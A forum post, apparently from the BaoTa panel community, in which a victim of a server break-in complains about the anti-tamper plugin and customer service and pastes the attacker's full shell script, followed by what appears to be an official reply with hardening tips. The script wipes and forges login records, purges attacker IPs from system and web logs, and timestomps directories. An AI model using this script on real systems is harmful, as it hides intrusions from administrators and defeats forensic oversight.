【疑难】关于我的网站被黑，发现的一些问题

事情经过
8.3日，宝塔防篡改插件到期，没注意续费，给了黑客可乘之机。8.4号我及时续费，但是购买了两次，一直显示没购买。经过两个小时的折腾，在宝塔客服的帮助下，我成功安装了插件。
并让客服帮忙把两笔购买，退掉任意一笔，由于退款那边下班了，只能等明天了，客服让我明天注意看退款。
晚上我放心的睡了，第二天一醒来，网站被黑，数据库被删干净了，我成功的失业了。
备注：连同我腾讯云cos的云备份，都删了，一个不留。

排查原因
经过排查，宝塔的防篡改插件，被莫名其妙到期了，卸载了。我看了客服留言，说是退了两笔，让我重新购买。

挂马排查
网站被传了一个无后缀文件，一个sh文件。具体文件我已经放在附件了。

网站本身有上传漏洞，注入漏洞，这个是我的原因，但是宝塔本身有一些莫名其妙的问题，是不是应该反思一下



最后建议
1.宝塔设置了腾讯云cos备份，黑客居然能通过一些手段，把云备份都给删了。
我测试了一下，直接在宝塔里，就可以通过备份记录，把云备份给删了。那么这个备份和本地备份有什么区别，为什么要给这个删除权限。

2.之前我也设置了防篡改，黑客依然能不停的创建 带 .的空文件夹，一直在尝试攻击
为什么防篡改的情况下，还能创建文件夹，这个是设计缺陷吗？离谱的是，黑客传了sh文件，执行了获取一些密码的命令，这个是怎么做到的？

3.宝塔做为一款这么经久不衰的运维工具，客服效率是不是应该提升一下？处理客户一些问题的方式，是不是有些欠妥？








官方也不用联系我了，该说的问题都说了，心灰意冷。以后我还是会用宝塔，只是不会再用宝塔去搭建商业网站了。也不会再付费了。

文件名
qing.sh


代码如下

#!/bin/bash
rm -f qing.sh*
rm -f hide_centos7*.sh*
user2=$(last -a | grep -v "root\|reboot\|system\|boot"|sed -n '1p' | awk '{print $1}')
user3=$(last -a | grep -v "root\|reboot\|$user2\|system\|boot"|sed -n '1p' | awk '{print $1}')
chattr -i /var/log/wtmp  ; chattr -i /root/.bash_history ; chattr -i /home/$user2/.bash_history ; rm -f /tmp/.font-unix/so.bak ;rm -f /usr/local/sbin/jon ;
ipset4='mysql1'
ipset3='18.162.213.72'
ipset2='localhost'

ipset='43.154.131.34'

ip=$(last -a |sed -n '1p' | awk '{print $10}')
user=$(last -a |sed -n '1p' | awk '{print $1}')
tip=$(last |sed -n '1p' | awk '{print $3}')
time=$(who /var/log/wtmp | sed -n '$p' | awk '{print $3,$4}' )
sjc=$(date -d "$time" +%s)
riqi=$(date -d @$sjc "+%Y:%m:%d:%H:%M:%S")
if [[ $tip = $ipset ]]; then
nl-addr -w $user $ipset
nl-addr -f /var/log/wtmp -w $user $ipset
nl-addr -u $user $ipset
nl-addr -f /run/utmp -u $user $ipset
fi

if [[ $tip = $ipset2 ]]; then
nl-addr -w $user $ipset2
nl-addr -f /var/log/wtmp -w $user $ipset2
nl-addr -u $user $ipset2
nl-addr -f /run/utmp -u $user $ipset2
fi
if [[ $tip = $ipset3 ]]; then
nl-addr -w $user $ipset3
nl-addr -f /var/log/wtmp -w $user $ipset3
nl-addr -u $user $ipset3
nl-addr -f /run/utmp -u $user $ipset3
fi
if [[ $tip = $ipset4 ]]; then
nl-addr -w $user $ipset4
nl-addr -f /var/log/wtmp -w $user $ipset4
nl-addr -u $user $ipset4
nl-addr -f /run/utmp -u $user $ipset4
fi



tip3=$(last |sed -n '1p' | awk '{print $3}')
time2=$(who /var/log/wtmp | sed -n '$p' | awk '{print $3}' )
#sed -i '/'$time2'/d' /var/log/dpkg.log* ;
#sed -i '/'$ipset'/d' /var/log/secure* ;
#sed -i '/'$ipset'/d' /var/log/audit/audit.* ;
#sed -i '/'$ipset'/d' /www/wwwlogs/access.* ;
#sed -i '/'error:'/d' /var/log/messages ;
#sed -i '/'systemd-logind:'/d' /var/log/messages ;
#sed -i '/'$ipset'/d' /var/log/auth.log* ;
#sed -i '/'kernel-'/d' /var/log/messages* ;
#sed -i '/'ipaddr:'/d' /var/log/messages* ;


kill -9 $(/usr/lib/ps -ef | grep rpm.sh | grep -v grep | awk '{print $2}') >/dev/null 2>&1
#kill -9 $(ps -ef | grep sftp-server | grep -v grep | awk '{print $2}') >/dev/null 2>&1

cd /etc
pro="chmod +x /usr/lib/"
ls="ls | grep"
pro=${pro//\//\\\/}
sid="setsid /usr/lib/rpm/rpm"
sid=${sid//\//\\\/}

sid2="setsid /usr/lib/apt/apt"
sid2=${sid2//\//\\\/}
sed -i '/'"$ls"'/,+3d' /etc/profile >/dev/null 2>&1
sed -i '/'"${pro}"'/,+2d' /etc/profile >/dev/null 2>&1
sed -i '/'"${sid}"'/,+1d' /etc/profile >/dev/null 2>&1
sed -i '/'"${sid2}"'/,+1d' /etc/profile >/dev/null 2>&1


touch -r /etc/* /usr/lib
touch -r /etc/* /usr/
touch -r /etc/* /usr/bin
touch -r /etc/* /usr/sbin
touch -r /etc/* /bin
touch -r /etc/* /tmp/.font-unix

tip2=$(last |sed -n '1p' | awk '{print $3}')
if [[ "$tip2" = "" ]]; then
nl-addr -m $user localhost tty1 $riqi
echo nl-addr -m $user localhost tty1 $riqi
else
nl-addr -m $user $tip2 tty1 $riqi
echo nl-addr -m $user $tip2 tty1 $riqi
fi

echo
echo 这里查看/root/.bash_history操作记录中有没有自己的记录---------------------------最近5条
echo
cat /root/.bash_history |tail -n 5
echo
user2=$(last -a | grep -v "root\|reboot\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user2 != "" ]]; then
echo 这里查看/root/$user2 的用户操作记录---------------------------------------------最近5条
cat /home/$user2/.bash_history |tail -n 5
fi
echo
user3=$(last -a | grep -v "root\|reboot\|$user2\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user3 != "" ]]; then
echo 这里查看/root/$user3 的用户操作记录---------------------------------------------最近5条
cat /home/$user3/.bash_history |tail -n 5
fi

echo
user4=$(last -a | grep -v "root\|reboot\|$user2\|$user3\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user4 != "" ]]; then
echo 这里查看/root/$user4 的用户操作记录---------------------------------------------最近5条
cat /home/$user4/.bash_history |tail -n 5
fi
user5=$(last -a | grep -v "root\|reboot\|$user2\|$user3\|$user4\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user5 != "" ]]; then
echo 这里查看/root/$user5 的用户操作记录---------------------------------------------最近5条
cat /home/$user5/.bash_history |tail -n 5
fi
echo 这里是查看last的最新登录ip是不是别人的---------------------------------------显示前三条登录记录
last -a | head -n 3
echo
ps aux | grep "12:9\|7:8\|7:9" | grep -v grep

文件名
zipFLIvo

代码太长了，贴不出来，经过加密的，也看不出所以然来

感谢你提供的宝贵建议，
1.关于云端备份的优化建议已经留言给对应开发，最后看是否合理并做优化
2.防篡改添加后，保护的目录是禁止创建文件夹和已经默认添加保护后缀的文件的；sh没有在默认的保护范围内，一般都是需要用户自行添加，防篡改插件支持高强度的自定义模式；另外，可以创建目录说明他可能是在排除的目录下创建的，这里给你一个建议，排除或没有受保护的目录，尽量都设置644权限，不给执行文件和创建权限；另外，你可以体验我们的重构版企业防篡改，内核级别防篡改，网站防篡改是事件型的，如果他入侵了你的服务器，有小概率掌握了服务器可以停止掉防篡改，当时重构版的企业防篡改就不同，内核驱动模式防护，需要体验的话我给你论坛绑定的手机号码发一个月的体验卷
3.关于客服的事宜感谢你的反馈，我会反馈给相关的客服部门了解情况

感谢你使用宝塔面板，最后给你整理了一些防挂马、篡改、恶意提权的小防护攻略。
1.网站上线前，对自己的项目用常用的一些工具进行程序漏洞安全扫描，并且做多份备份；
2.为了安全起见，网站后台管理地址经常改，改完做多份纪录保存，并且做好历史修改记录；
3.默认数据库名称要改，能复杂尽量复杂，用好复制粘贴按键；
4.后台启用验证码登录模块，不要怕麻烦，人家弄你网站的人都不嫌麻烦；
5.做好网站防护，比如非法上传文件、会员上传恶意文件的功能等，装好web防火墙；
6.服务器主机的ssh能不开就不能，尽量少使用root用户登录；即使登录也做好登录限制为仅允许自己的ip，高强度复杂的密码是第一必设项；
7.宝塔面板有多个辅助防护插件，例如调用系统防火墙、web防火墙、php安全防护、防篡改(企业防篡改重构版)、防入侵等。

关于备份被清理掉问题，建议远程备份用阿里oss（做好相关设置后）就不怕被清理了，七牛和腾讯的cos没有研究过